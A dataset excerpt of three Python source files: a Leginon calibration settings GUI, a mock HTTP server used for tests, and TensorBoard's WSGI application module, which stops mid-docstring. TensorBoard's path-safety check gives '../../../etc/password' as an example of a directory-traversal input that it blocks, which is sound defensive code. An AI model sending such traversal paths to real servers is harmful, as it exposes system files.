source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
Calibrator.py
|
# The Leginon software is Copyright 2004
# The Scripps Research Institute, La Jolla, CA
# For terms of the license agreement
# see http://ami.scripps.edu/software/leginon-license
#
import threading
import wx
from leginon.gui.wx.Choice import Choice
from leginon.gui.wx.Entry import FloatEntry
import leginon.gui.wx.Camera
import leginon.gui.wx.Events
import leginon.gui.wx.TargetPanel
import leginon.gui.wx.Node
import leginon.gui.wx.Settings
import leginon.gui.wx.ToolBar
import leginon.gui.wx.Instrument
class SettingsDialog(leginon.gui.wx.Settings.Dialog):
def initialize(self):
return ScrolledSettings(self,self.scrsize,False,False)
class ScrolledSettings(leginon.gui.wx.Settings.ScrolledDialog):
def initialize(self):
leginon.gui.wx.Settings.ScrolledDialog.initialize(self)
sb = wx.StaticBox(self, -1, 'Calibration')
sbsz = wx.StaticBoxSizer(sb, wx.VERTICAL)
if self.show_basic:
sz = self.addBasicSettings()
else:
sz = self.addSettings()
sbsz.Add(sz, 0, wx.ALIGN_CENTER|wx.EXPAND|wx.ALL, 5)
return [sbsz]
def addBasicSettings(self):
self.widgets['override preset'] = wx.CheckBox(self, -1, 'Override Preset')
sz = wx.GridBagSizer(5, 5)
sz.Add(self.widgets['override preset'], (0, 0), (1, 1), wx.ALIGN_CENTER_VERTICAL)
sz.AddGrowableCol(0)
return sz
def addSettings(self):
self.widgets['correlation type'] = Choice(self, -1, choices=self.node.cortypes)
self.widgets['override preset'] = wx.CheckBox(self, -1, 'Override Preset')
self.widgets['instruments'] = leginon.gui.wx.Instrument.SelectionPanel(self)
self.panel.setInstrumentSelection(self.widgets['instruments'])
self.widgets['camera settings'] = leginon.gui.wx.Camera.CameraPanel(self)
self.widgets['camera settings'].setGeometryLimits({'size':self.node.instrument.camerasize,'binnings':self.node.instrument.camerabinnings,'binmethod':self.node.instrument.camerabinmethod})
szcor = wx.GridBagSizer(5, 5)
label = wx.StaticText(self, -1, 'Use')
szcor.Add(label, (0, 0), (1, 1), wx.ALIGN_CENTER_VERTICAL)
szcor.Add(self.widgets['correlation type'], (0, 1), (1, 1), wx.ALIGN_CENTER_VERTICAL)
label = wx.StaticText(self, -1, 'correlation')
szcor.Add(label, (0, 2), (1, 1), wx.ALIGN_CENTER_VERTICAL)
szlpf = wx.GridBagSizer(5, 5)
label = wx.StaticText(self, -1, 'phase correlation low pass filter')
szlpf.Add(label, (0, 0), (1, 3), wx.ALIGN_CENTER_VERTICAL)
label = wx.StaticText(self, -1, 'sigma:')
szlpf.Add(label, (1, 0), (1, 1), wx.ALIGN_CENTER_VERTICAL)
self.widgets['phase corr lpf sigma'] = FloatEntry(self, -1,
min=0.0, chars=4)
szlpf.Add(self.widgets['phase corr lpf sigma'], (1, 1), (1, 1), wx.ALIGN_CENTER_VERTICAL)
label = wx.StaticText(self, -1, 'pixels')
szlpf.Add(label, (1, 2), (1, 1), wx.ALIGN_CENTER_VERTICAL)
sz = wx.GridBagSizer(5, 5)
sz.Add(szcor, (0, 0), (1, 1), wx.ALIGN_CENTER_VERTICAL)
sz.Add(szlpf, (1, 0), (1, 1), wx.ALIGN_CENTER_VERTICAL)
sz.Add(self.widgets['override preset'], (2, 0), (1, 1), wx.ALIGN_CENTER_VERTICAL)
sz.Add(self.widgets['instruments'], (3, 0), (1, 1), wx.ALIGN_CENTER_VERTICAL)
sz.Add(self.widgets['camera settings'], (0, 1), (4, 1), wx.ALIGN_CENTER|wx.EXPAND)
sz.AddGrowableRow(3)
sz.AddGrowableCol(0)
sz.AddGrowableCol(1)
return sz
class Panel(leginon.gui.wx.Node.Panel, leginon.gui.wx.Instrument.SelectionMixin):
imageclass = leginon.gui.wx.TargetPanel.TargetImagePanel
settingsdialogclass = SettingsDialog
def __init__(self, *args, **kwargs):
leginon.gui.wx.Node.Panel.__init__(self, *args, **kwargs)
leginon.gui.wx.Instrument.SelectionMixin.__init__(self)
self.toolbar.AddTool(leginon.gui.wx.ToolBar.ID_SETTINGS,
'settings',
shortHelpString='Settings')
self.toolbar.AddSeparator()
self.toolbar.AddTool(leginon.gui.wx.ToolBar.ID_ACQUIRE,
'acquire',
shortHelpString='Acquire Image')
self.toolbar.AddSeparator()
self.toolbar.AddTool(leginon.gui.wx.ToolBar.ID_CALIBRATE,
'play',
shortHelpString='Calibrate')
self.toolbar.AddTool(leginon.gui.wx.ToolBar.ID_ABORT,
'stop',
shortHelpString='Abort')
self.toolbar.EnableTool(leginon.gui.wx.ToolBar.ID_ABORT, False)
self.initialize()
self.Bind(leginon.gui.wx.Events.EVT_CALIBRATION_DONE, self.onCalibrationDone)
self.SetSizer(self.szmain)
self.SetAutoLayout(True)
self.SetupScrolling()
def initialize(self):
# image
self.imagepanel = self.imageclass(self, -1)
self.imagepanel.addTypeTool('Image', display=True)
self.imagepanel.selectiontool.setDisplayed('Image', True)
self.imagepanel.addTypeTool('Correlation', display=True)
if isinstance(self.imagepanel, leginon.gui.wx.TargetPanel.TargetImagePanel):
color = wx.Colour(255, 128, 0)
self.imagepanel.addTargetTool('Peak', color)
self.szmain.Add(self.imagepanel, (0, 0), (1, 1), wx.EXPAND)
self.szmain.AddGrowableRow(0)
self.szmain.AddGrowableCol(0)
def onNodeInitialized(self):
leginon.gui.wx.Instrument.SelectionMixin.onNodeInitialized(self)
self.toolbar.Bind(wx.EVT_TOOL, self.onSettingsTool,
id=leginon.gui.wx.ToolBar.ID_SETTINGS)
self.toolbar.Bind(wx.EVT_TOOL, self.onAcquireTool,
id=leginon.gui.wx.ToolBar.ID_ACQUIRE)
self.toolbar.Bind(wx.EVT_TOOL, self.onCalibrateTool,
id=leginon.gui.wx.ToolBar.ID_CALIBRATE)
self.toolbar.Bind(wx.EVT_TOOL, self.onAbortTool,
id=leginon.gui.wx.ToolBar.ID_ABORT)
def _acquisitionEnable(self, enable):
self.toolbar.Enable(enable)
def onAcquisitionDone(self, evt):
self._acquisitionEnable(True)
def _calibrationEnable(self, enable):
self.toolbar.Enable(enable)
def onCalibrationDone(self, evt):
self._calibrationEnable(True)
def calibrationDone(self):
evt = leginon.gui.wx.Events.CalibrationDoneEvent()
self.GetEventHandler().AddPendingEvent(evt)
def onAcquireTool(self, evt):
self._acquisitionEnable(False)
threading.Thread(target=self.node.acquireImage).start()
def onSettingsTool(self, evt):
dialog = self.settingsdialogclass(self,show_basic=True)
dialog.ShowModal()
dialog.Destroy()
def onCalibrateTool(self, evt):
raise NotImplementedError
def onAbortTool(self, evt):
raise NotImplementedError
if __name__ == '__main__':
class FakeInstrument(object):
def __init__(self):
self.camerasize = {'x': 1024, 'y': 1024}
class FakeNode(object):
def __init__(self):
self.cortypes = ['foo', 'bar']
self.instrument = FakeInstrument()
def getSettings(self):
return {}
class FakePanel(wx.Panel):
def __init__(self, *args, **kwargs):
wx.Panel.__init__(self, *args, **kwargs)
self.node = FakeNode()
def setInstrumentSelection(self, widget):
widget.setTEMs(['foo longer name', 'bar'])
widget.setTEM('foo longer name')
widget.setCCDCameras(['foo longer name', 'bar'])
widget.setCCDCamera('bar')
class App(wx.App):
def OnInit(self):
frame = wx.Frame(None, -1, 'Calibration Test')
panel = FakePanel(frame, -1)
dialog = SettingsDialog(panel, 'Test')
self.SetTopWindow(frame)
frame.Show()
dialog.ShowModal()
return True
app = App(0)
app.MainLoop()
|
mock_remote_server.py
|
"""
An HTTP server that listens on localhost and returns a variety of responses for
mocking remote servers.
"""
from builtins import str
from builtins import range
from builtins import object
from contextlib import contextmanager
from threading import Thread
from time import sleep
from wsgiref.simple_server import make_server
from future.moves.urllib.request import urlopen
import socket
import os
from functools import reduce
class MockHTTPServer(object):
"""
Mock HTTP server that can take the place of a remote server for testing
fetching of remote resources.
Uses contextmanager to allow easy setup and teardown of the WSGI server in
a separate thread, eg::
>>> with MockTestServer().serve() as server_address:
... urlopen(server_address)
...
Subclass this and override __call__ to provide your own WSGI handler function.
"""
def __call__(self, environ, start_response):
raise NotImplementedError()
@contextmanager
def serve(self, host='localhost', port_range=(8000, 9000)):
"""
Start an instance of wsgiref.simple_server set up to handle requests in
a separate daemon thread.
Return the address of the server eg ('http://localhost:8000').
This uses context manager to make sure the server is stopped::
>>> with MockTestServer().serve() as addr:
... print urlopen('%s/?content=hello+world').read()
...
'hello world'
"""
for port in range(*port_range):
try:
server = make_server(host, port, self)
except socket.error:
continue
break
else:
raise Exception("Could not bind to a port in range %r" % (port_range,))
serving = True
def _serve_until_stopped():
while serving:
server.handle_request()
thread = Thread(target=_serve_until_stopped)
thread.daemon = True
thread.start()
try:
yield 'http://%s:%d' % (host, port)
finally:
serving = False
# Call the server to make sure the waiting handle_request()
# call completes. Set a very small timeout as we don't actually need to
# wait for a response. We don't care about exceptions here either.
try:
urlopen("http://%s:%s/" % (host, port), timeout=0.01)
except Exception:
pass
@classmethod
def get_content(cls, varspec):
"""
Return the value of the variable at varspec, which must be in the
format 'package.module:variable'. If variable is callable, it will be
called and its return value used.
"""
modpath, var = varspec.split(':')
mod = reduce(getattr, modpath.split('.')[1:], __import__(modpath))
var = reduce(getattr, var.split('.'), mod)
try:
return var()
except TypeError:
return var
class MockEchoTestServer(MockHTTPServer):
"""
WSGI application that echos back the status, headers and
content passed via the URL, eg:
a 500 error response: 'http://localhost/?status=500'
a 200 OK response, returning the function's docstring:
'http://localhost/?status=200;content-type=text/plain;content_var
=ckan.tests.lib.test_package_search:test_wsgi_app.__doc__'
To specify content, use:
content=string
content_var=package.module:variable
"""
def __call__(self, environ, start_response):
from http.client import responses
from webob import Request
request = Request(environ)
status = int(request.str_params.get('status', '200'))
# if 'redirect' in redirect.str_params:
# params = dict([(key, value) for param in request.str_params \
# if key != 'redirect'])
# redirect_status = int(request.str_params['redirect'])
# status = int(request.str_params.get('status', '200'))
# resp = make_response(render_template('error.html'), redirect_status)
# resp.headers['Location'] = url_for(request.path, params)
# return resp
if 'content_var' in request.str_params:
content = request.str_params.get('content_var')
content = self.get_content(content)
elif 'content_long' in request.str_params:
content = '*' * 1000001
else:
content = request.str_params.get('content', '')
if 'method' in request.str_params \
and request.method.lower() != request.str_params['method'].lower():
content = ''
status = 405
if isinstance(content, str):
raise TypeError("Expected raw byte string for content")
headers = [
item
for item in list(request.str_params.items())
if item[0] not in ('content', 'status')
]
if 'length' in request.str_params:
cl = request.str_params.get('length')
headers += [('Content-Length', cl)]
elif content and 'no-content-length' not in request.str_params:
headers += [('Content-Length', bytes(len(content)))]
start_response(
'%d %s' % (status, responses[status]),
headers
)
return [content]
class MockTimeoutTestServer(MockHTTPServer):
"""
Sleeps ``timeout`` seconds before responding. Make sure that your timeout value is
less than this to check handling timeout conditions.
"""
def __init__(self, timeout):
super(MockTimeoutTestServer, self).__init__()
self.timeout = timeout
def __call__(self, environ, start_response):
# Sleep until self.timeout or the parent thread finishes
sleep(self.timeout)
start_response('200 OK', [('Content-Type', 'text/plain')])
return ['xyz']
def get_file_content(data_filename):
filepath = os.path.join(os.path.dirname(__file__), 'data', data_filename)
assert os.path.exists(filepath), filepath
with open(filepath, 'rb') as f:
return f.read()
class MockWmsServer(MockHTTPServer):
"""Acts like an OGC WMS server (well, one basic call)
"""
def __init__(self, wms_version='1.3'):
self.wms_version = wms_version
super(MockWmsServer, self).__init__()
def __call__(self, environ, start_response):
from http.client import responses
from webob import Request
request = Request(environ)
status = int(request.str_params.get('status', '200'))
headers = {'Content-Type': 'text/plain'}
# e.g. params ?service=WMS&request=GetCapabilities&version=1.1.1
if request.str_params.get('service') != 'WMS':
status = 200
content = ERROR_WRONG_SERVICE
elif request.str_params.get('request') != 'GetCapabilities':
status = 405
content = '"request" param wrong'
elif 'version' in request.str_params and \
request.str_params.get('version') != self.wms_version:
status = 405
content = '"version" not compatible - need to be %s' % self.wms_version
elif self.wms_version == '1.1.1':
status = 200
content = get_file_content('wms_getcap_1.1.1.xml')
elif self.wms_version == '1.3':
status = 200
content = get_file_content('wms_getcap_1.3.xml')
start_response(
'%d %s' % (status, responses[status]),
list(headers.items())
)
return [content]
class MockWfsServer(MockHTTPServer):
"""Acts like an OGC WFS server (well, one basic call)
"""
def __init__(self):
super(MockWfsServer, self).__init__()
def __call__(self, environ, start_response):
from http.client import responses
from webob import Request
request = Request(environ)
status = int(request.str_params.get('status', '200'))
headers = {'Content-Type': 'text/plain'}
# e.g. params ?service=WFS&request=GetCapabilities
if request.str_params.get('service') != 'WFS':
status = 200
content = ERROR_WRONG_SERVICE
elif request.str_params.get('request') != 'GetCapabilities':
status = 405
content = '"request" param wrong'
else:
status = 200
content = get_file_content('wfs_getcap.xml')
start_response(
'%d %s' % (status, responses[status]),
list(headers.items())
)
return [content]
ERROR_WRONG_SERVICE = "<ows:ExceptionReport version='1.1.0' language='en'" \
" xmlns:ows='http://www.opengis.net/ows'><ows:Exception exceptionCode='NoApplicableCode'>" \
"<ows:ExceptionText>Wrong service type.</ows:ExceptionText></ows:Exception></ows:ExceptionReport>"
|
application.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""TensorBoard WSGI Application Logic.
TensorBoardApplication constructs TensorBoard as a WSGI application.
It handles serving static assets, and implements TensorBoard data APIs.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import csv
import imghdr
import mimetypes
import os
import re
import threading
import time
import six
from six import StringIO
from six.moves import urllib
from six.moves import xrange # pylint: disable=redefined-builtin
from six.moves.urllib import parse as urlparse
from werkzeug import wrappers
from tensorflow.python.platform import resource_loader
from tensorflow.python.platform import tf_logging as logging
from tensorflow.tensorboard.backend import http_util
from tensorflow.tensorboard.backend import process_graph
from tensorflow.tensorboard.backend.event_processing import event_accumulator
from tensorflow.tensorboard.backend.event_processing import event_multiplexer
from tensorflow.tensorboard.plugins.debugger import debugger_plugin
from tensorflow.tensorboard.plugins.projector import projector_plugin
from tensorflow.tensorboard.plugins.text import text_plugin
DEFAULT_SIZE_GUIDANCE = {
event_accumulator.COMPRESSED_HISTOGRAMS: 500,
event_accumulator.IMAGES: 10,
event_accumulator.AUDIO: 10,
event_accumulator.SCALARS: 1000,
event_accumulator.HEALTH_PILLS: 100,
event_accumulator.HISTOGRAMS: 50,
}
DATA_PREFIX = '/data'
LOGDIR_ROUTE = '/logdir'
RUNS_ROUTE = '/runs'
PLUGIN_PREFIX = '/plugin'
SCALARS_ROUTE = '/' + event_accumulator.SCALARS
IMAGES_ROUTE = '/' + event_accumulator.IMAGES
AUDIO_ROUTE = '/' + event_accumulator.AUDIO
HISTOGRAMS_ROUTE = '/' + event_accumulator.HISTOGRAMS
COMPRESSED_HISTOGRAMS_ROUTE = '/' + event_accumulator.COMPRESSED_HISTOGRAMS
INDIVIDUAL_IMAGE_ROUTE = '/individualImage'
INDIVIDUAL_AUDIO_ROUTE = '/individualAudio'
GRAPH_ROUTE = '/' + event_accumulator.GRAPH
RUN_METADATA_ROUTE = '/' + event_accumulator.RUN_METADATA
TAB_ROUTES = ['', '/events', '/images', '/audio', '/graphs', '/histograms']
_IMGHDR_TO_MIMETYPE = {
'bmp': 'image/bmp',
'gif': 'image/gif',
'jpeg': 'image/jpeg',
'png': 'image/png'
}
_DEFAULT_IMAGE_MIMETYPE = 'application/octet-stream'
def _content_type_for_image(encoded_image_string):
image_type = imghdr.what(None, encoded_image_string)
return _IMGHDR_TO_MIMETYPE.get(image_type, _DEFAULT_IMAGE_MIMETYPE)
class _OutputFormat(object):
"""An enum used to list the valid output formats for API calls.
Not all API calls support all formats (for example, only scalars and
compressed histograms support CSV).
"""
JSON = 'json'
CSV = 'csv'
def standard_tensorboard_wsgi(logdir, purge_orphaned_data, reload_interval):
"""Construct a TensorBoardWSGIApp with standard plugins and multiplexer."""
multiplexer = event_multiplexer.EventMultiplexer(
size_guidance=DEFAULT_SIZE_GUIDANCE,
purge_orphaned_data=purge_orphaned_data)
plugins = [
debugger_plugin.DebuggerPlugin(),
projector_plugin.ProjectorPlugin(),
text_plugin.TextPlugin(),
]
return TensorBoardWSGIApp(logdir, plugins, multiplexer, reload_interval)
class TensorBoardWSGIApp(object):
"""The TensorBoard application, conforming to WSGI spec."""
# How many samples to include in sampling API calls by default.
DEFAULT_SAMPLE_COUNT = 10
# NOTE TO MAINTAINERS: An accurate Content-Length MUST be specified on all
# responses using send_header.
protocol_version = 'HTTP/1.1'
def __init__(self, logdir, plugins, multiplexer, reload_interval):
"""Constructs the TensorBoard application.
Args:
logdir: the logdir spec that describes where data will be loaded.
may be a directory, or comma,separated list of directories, or colons
can be used to provide named directories
plugins: List of plugins that extend tensorboard.plugins.BasePlugin
multiplexer: The EventMultiplexer with TensorBoard data to serve
reload_interval: How often (in seconds) to reload the Multiplexer
Returns:
A WSGI application that implements the TensorBoard backend.
Raises:
ValueError: If some plugin has no plugin_name
ValueError: If two plugins have the same plugin_name
"""
self._logdir = logdir
self._plugins = plugins
self._multiplexer = multiplexer
self.tag = get_tensorboard_tag()
path_to_run = parse_event_files_spec(self._logdir)
if reload_interval:
start_reloading_multiplexer(self._multiplexer, path_to_run,
reload_interval)
else:
reload_multiplexer(self._multiplexer, path_to_run)
self.data_applications = {
DATA_PREFIX + LOGDIR_ROUTE:
self._serve_logdir,
DATA_PREFIX + SCALARS_ROUTE:
self._serve_scalars,
DATA_PREFIX + GRAPH_ROUTE:
self._serve_graph,
DATA_PREFIX + RUN_METADATA_ROUTE:
self._serve_run_metadata,
DATA_PREFIX + HISTOGRAMS_ROUTE:
self._serve_histograms,
DATA_PREFIX + COMPRESSED_HISTOGRAMS_ROUTE:
self._serve_compressed_histograms,
DATA_PREFIX + IMAGES_ROUTE:
self._serve_images,
DATA_PREFIX + INDIVIDUAL_IMAGE_ROUTE:
self._serve_image,
DATA_PREFIX + AUDIO_ROUTE:
self._serve_audio,
DATA_PREFIX + INDIVIDUAL_AUDIO_ROUTE:
self._serve_individual_audio,
DATA_PREFIX + RUNS_ROUTE:
self._serve_runs,
'/app.js':
self._serve_js
}
# Serve the routes from the registered plugins using their name as the route
# prefix. For example if plugin z has two routes /a and /b, they will be
# served as /data/plugin/z/a and /data/plugin/z/b.
plugin_names_encountered = set()
for plugin in self._plugins:
if plugin.plugin_name is None:
raise ValueError('Plugin %s has no plugin_name' % plugin)
if plugin.plugin_name in plugin_names_encountered:
raise ValueError('Duplicate plugins for name %s' % plugin.plugin_name)
plugin_names_encountered.add(plugin.plugin_name)
try:
plugin_apps = plugin.get_plugin_apps(self._multiplexer, self._logdir)
except Exception as e: # pylint: disable=broad-except
logging.warning('Plugin %s failed. Exception: %s', plugin.plugin_name,
str(e))
continue
for route, app in plugin_apps.items():
path = DATA_PREFIX + PLUGIN_PREFIX + '/' + plugin.plugin_name + route
self.data_applications[path] = app
# We use underscore_names for consistency with inherited methods.
def _image_response_for_run(self, run_images, run, tag):
"""Builds a JSON-serializable object with information about run_images.
Args:
run_images: A list of event_accumulator.ImageValueEvent objects.
run: The name of the run.
tag: The name of the tag the images all belong to.
Returns:
A list of dictionaries containing the wall time, step, URL, width, and
height for each image.
"""
response = []
for index, run_image in enumerate(run_images):
response.append({
'wall_time': run_image.wall_time,
'step': run_image.step,
# We include the size so that the frontend can add that to the <img>
# tag so that the page layout doesn't change when the image loads.
'width': run_image.width,
'height': run_image.height,
'query': self._query_for_individual_image(run, tag, index)
})
return response
def _audio_response_for_run(self, run_audio, run, tag):
"""Builds a JSON-serializable object with information about run_audio.
Args:
run_audio: A list of event_accumulator.AudioValueEvent objects.
run: The name of the run.
tag: The name of the tag the images all belong to.
Returns:
A list of dictionaries containing the wall time, step, URL, and
content_type for each audio clip.
"""
response = []
for index, run_audio_clip in enumerate(run_audio):
response.append({
'wall_time': run_audio_clip.wall_time,
'step': run_audio_clip.step,
'content_type': run_audio_clip.content_type,
'query': self._query_for_individual_audio(run, tag, index)
})
return response
def _path_is_safe(self, path):
"""Check path is safe (stays within current directory).
This is for preventing directory-traversal attacks.
Args:
path: The path to check for safety.
Returns:
True if the given path stays within the current directory, and false
if it would escape to a higher directory. E.g. _path_is_safe('index.html')
returns true, but _path_is_safe('../../../etc/password') returns false.
"""
base = os.path.abspath(os.curdir)
absolute_path = os.path.abspath(path)
prefix = os.path.commonprefix([base, absolute_path])
return prefix == base
@wrappers.Request.application
def _serve_logdir(self, request):
"""Respond with a JSON object containing this TensorBoard's logdir."""
return http_util.Respond(
request, {'logdir': self._logdir}, 'application/json')
@wrappers.Request.application
def _serve_scalars(self, request):
"""Given a tag and single run, return array of ScalarEvents."""
# TODO(cassandrax): return HTTP status code for malformed requests
tag = request.args.get('tag')
run = request.args.get('run')
values = self._multiplexer.Scalars(run, tag)
if request.args.get('format') == _OutputFormat.CSV:
string_io = StringIO()
writer = csv.writer(string_io)
writer.writerow(['Wall time', 'Step', 'Value'])
writer.writerows(values)
return http_util.Respond(request, string_io.getvalue(), 'text/csv')
else:
return http_util.Respond(request, values, 'application/json')
@wrappers.Request.application
def _serve_graph(self, request):
"""Given a single run, return the graph definition in json format."""
run = request.args.get('run', None)
if run is None:
return http_util.Respond(
request, 'query parameter "run" is required', 'text/plain', 400)
try:
graph = self._multiplexer.Graph(run)
except ValueError:
return http_util.Respond(
request, '404 Not Found', 'text/plain; charset=UTF-8', code=404)
limit_attr_size = request.args.get('limit_attr_size', None)
if limit_attr_size is not None:
try:
limit_attr_size = int(limit_attr_size)
except ValueError:
return http_util.Respond(
request, 'query parameter `limit_attr_size` must be integer',
'text/plain', 400)
large_attrs_key = request.args.get('large_attrs_key', None)
try:
process_graph.prepare_graph_for_ui(graph, limit_attr_size,
large_attrs_key)
except ValueError as e:
return http_util.Respond(request, e.message, 'text/plain', 400)
return http_util.Respond(request, str(graph), 'text/x-protobuf') # pbtxt
@wrappers.Request.application
def _serve_run_metadata(self, request):
"""Given a tag and a TensorFlow run, return the session.run() metadata."""
tag = request.args.get('tag', None)
run = request.args.get('run', None)
if tag is None:
return http_util.Respond(
request, 'query parameter "tag" is required', 'text/plain', 400)
if run is None:
return http_util.Respond(
request, 'query parameter "run" is required', 'text/plain', 400)
try:
run_metadata = self._multiplexer.RunMetadata(run, tag)
except ValueError:
return http_util.Respond(
request, '404 Not Found', 'text/plain; charset=UTF-8', code=404)
return http_util.Respond(
request, str(run_metadata), 'text/x-protobuf') # pbtxt
@wrappers.Request.application
def _serve_histograms(self, request):
"""Given a tag and single run, return an array of histogram values."""
tag = request.args.get('tag')
run = request.args.get('run')
values = self._multiplexer.Histograms(run, tag)
return http_util.Respond(request, values, 'application/json')
@wrappers.Request.application
def _serve_compressed_histograms(self, request):
"""Given a tag and single run, return an array of compressed histograms."""
tag = request.args.get('tag')
run = request.args.get('run')
compressed_histograms = self._multiplexer.CompressedHistograms(run, tag)
if request.args.get('format') == _OutputFormat.CSV:
string_io = StringIO()
writer = csv.writer(string_io)
# Build the headers; we have two columns for timing and two columns for
# each compressed histogram bucket.
headers = ['Wall time', 'Step']
if compressed_histograms:
bucket_count = len(compressed_histograms[0].compressed_histogram_values)
for i in xrange(bucket_count):
headers += ['Edge %d basis points' % i, 'Edge %d value' % i]
writer.writerow(headers)
for compressed_histogram in compressed_histograms:
row = [compressed_histogram.wall_time, compressed_histogram.step]
for value in compressed_histogram.compressed_histogram_values:
row += [value.rank_in_bps, value.value]
writer.writerow(row)
return http_util.Respond(request, string_io.getvalue(), 'text/csv')
else:
return http_util.Respond(
request, compressed_histograms, 'application/json')
@wrappers.Request.application
def _serve_images(self, request):
"""Given a tag and list of runs, serve a list of images.
Note that the images themselves are not sent; instead, we respond with URLs
to the images. The frontend should treat these URLs as opaque and should not
try to parse information about them or generate them itself, as the format
may change.
Args:
request: A werkzeug.wrappers.Request object.
Returns:
A werkzeug.Response application.
"""
tag = request.args.get('tag')
run = request.args.get('run')
images = self._multiplexer.Images(run, tag)
response = self._image_response_for_run(images, run, tag)
return http_util.Respond(request, response, 'application/json')
@wrappers.Request.application
def _serve_image(self, request):
"""Serves an individual image."""
tag = request.args.get('tag')
run = request.args.get('run')
index = int(request.args.get('index'))
image = self._multiplexer.Images(run, tag)[index]
encoded_image_string = image.encoded_image_string
content_type = _content_type_for_image(encoded_image_string)
return http_util.Respond(request, encoded_image_string, content_type)
def _query_for_individual_image(self, run, tag, index):
"""Builds a URL for accessing the specified image.
This should be kept in sync with _serve_image. Note that the URL is *not*
guaranteed to always return the same image, since images may be unloaded
from the reservoir as new images come in.
Args:
run: The name of the run.
tag: The tag.
index: The index of the image. Negative values are OK.
Returns:
A string representation of a URL that will load the index-th
sampled image in the given run with the given tag.
"""
query_string = urllib.parse.urlencode({
'run': run,
'tag': tag,
'index': index
})
return query_string
@wrappers.Request.application
def _serve_audio(self, request):
"""Given a tag and list of runs, serve a list of audio.
Note that the audio clips themselves are not sent; instead, we respond with
URLs to the audio. The frontend should treat these URLs as opaque and should
not try to parse information about them or generate them itself, as the
format may change.
Args:
request: A werkzeug.wrappers.Request object.
Returns:
A werkzeug.Response application.
"""
tag = request.args.get('tag')
run = request.args.get('run')
audio_list = self._multiplexer.Audio(run, tag)
response = self._audio_response_for_run(audio_list, run, tag)
return http_util.Respond(request, response, 'application/json')
@wrappers.Request.application
def _serve_individual_audio(self, request):
"""Serves an individual audio clip."""
tag = request.args.get('tag')
run = request.args.get('run')
index = int(request.args.get('index'))
audio = self._multiplexer.Audio(run, tag)[index]
return http_util.Respond(
request, audio.encoded_audio_string, audio.content_type)
def _query_for_individual_audio(self, run, tag, index):
"""Builds a URL for accessing the specified audio.
This should be kept in sync with _serve_individual_audio. Note that the URL
is *not* guaranteed to always return the same audio, since audio may be
unloaded from the reservoir as new audio comes in.
Args:
run: The name of the run.
tag: The tag.
index: The index of the audio. Negative values are OK.
Returns:
A string representation of a URL that will load the index-th
sampled audio in the given run with the given tag.
"""
query_string = urllib.parse.urlencode({
'run': run,
'tag': tag,
'index': index
})
return query_string
@wrappers.Request.application
def _serve_runs(self, request):
"""WSGI app serving a JSON object about runs and tags.
Returns a mapping from runs to tagType to list of tags for that run.
Args:
request: A werkzeug request
Returns:
A werkzeug Response with the following content:
{runName: {images: [tag1, tag2, tag3],
audio: [tag4, tag5, tag6],
scalars: [tagA, tagB, tagC],
histograms: [tagX, tagY, tagZ],
firstEventTimestamp: 123456.789}}
"""
runs = self._multiplexer.Runs()
for run_name, run_data in runs.items():
try:
run_data['firstEventTimestamp'] = self._multiplexer.FirstEventTimestamp(
run_name)
except ValueError:
logging.warning('Unable to get first event timestamp for run %s',
run_name)
run_data['firstEventTimestamp'] = None
return http_util.Respond(request, runs, 'application/json')
@wrappers.Request.application
def _serve_index(self, request):
"""Serves the index page (i.e., the tensorboard app itself)."""
return self._serve_static_file(request, '/dist/index.html')
@wrappers.Request.application
def _serve_js(self, request):
"""Serves the JavaScript for the index page."""
return self._serve_static_file(request, '/dist/app.js')
def _serve_static_file(self, request, path):
"""Serves the static file located at the given path.
Args:
request: A werkzeug Request
path: The path of the static file, relative to the tensorboard/ directory.
Returns:
A werkzeug.Response application.
"""
# Strip off the leading forward slash.
orig_path = path.lstrip('/')
if not self._path_is_safe(orig_path):
logging.warning('path not safe: %s', orig_path)
return http_util.Respond(request, 'Naughty naughty!', 'text/plain', 400)
# Resource loader wants a path relative to //WORKSPACE/tensorflow.
path = os.path.join('tensorboard', orig_path)
# Open the file and read it.
try:
contents = resource_loader.load_resource(path)
except IOError:
# For compatibility with latest version of Bazel, we renamed bower
# packages to use '_' rather than '-' in their package name.
# This means that the directory structure is changed too.
# So that all our recursive imports work, we need to modify incoming
# requests to map onto the new directory structure.
path = orig_path
components = path.split('/')
components[0] = components[0].replace('-', '_')
path = ('/').join(components)
# Bazel keeps all the external dependencies in //WORKSPACE/external.
# and resource loader wants a path relative to //WORKSPACE/tensorflow/.
path = os.path.join('../external', path)
try:
contents = resource_loader.load_resource(path)
except IOError:
logging.warning('path %s not found, sending 404', path)
return http_util.Respond(request, 'Not found', 'text/plain', code=404)
mimetype, content_encoding = mimetypes.guess_type(path)
mimetype = mimetype or 'application/octet-stream'
return http_util.Respond(
request,
contents,
mimetype,
expires=3600,
content_encoding=content_encoding)
def __call__(self, environ, start_response): # pylint: disable=invalid-name
"""Central entry point for the TensorBoard application.
This method handles routing to sub-applications. It does simple routing
using regular expression matching.
This __call__ method conforms to the WSGI spec, so that instances of this
class are WSGI applications.
Args:
environ: See WSGI spec.
start_response: See WSGI spec.
Returns:
A werkzeug Response.
"""
request = wrappers.Request(environ)
parsed_url = urlparse.urlparse(request.path)
# Remove a trailing slash, if present.
clean_path = parsed_url.path
if clean_path.endswith('/'):
clean_path = clean_path[:-1]
# pylint: disable=too-many-function-args
if clean_path in self.data_applications:
return self.data_applications[clean_path](environ, start_response)
elif clean_path in TAB_ROUTES:
return self._serve_index(environ, start_response)
else:
return self._serve_static_file(request, clean_path)(environ,
start_response)
# pylint: enable=too-many-function-args
def parse_event_files_spec(logdir):
"""Parses `logdir` into a map from paths to run group names.
The events files flag format is a comma-separated list of path specifications.
A path specification either looks like 'group_name:/path/to/directory' or
'/path/to/directory'; in the latter case, the group is unnamed. Group names
cannot start with a forward slash: /foo:bar/baz will be interpreted as a
spec with no name and path '/foo:bar/baz'.
Globs are not supported.
Args:
logdir: A comma-separated list of run specifications.
Returns:
A dict mapping directory paths to names like {'/path/to/directory': 'name'}.
Groups without an explicit name are named after their path. If logdir is
None, returns an empty dict, which is helpful for testing things that don't
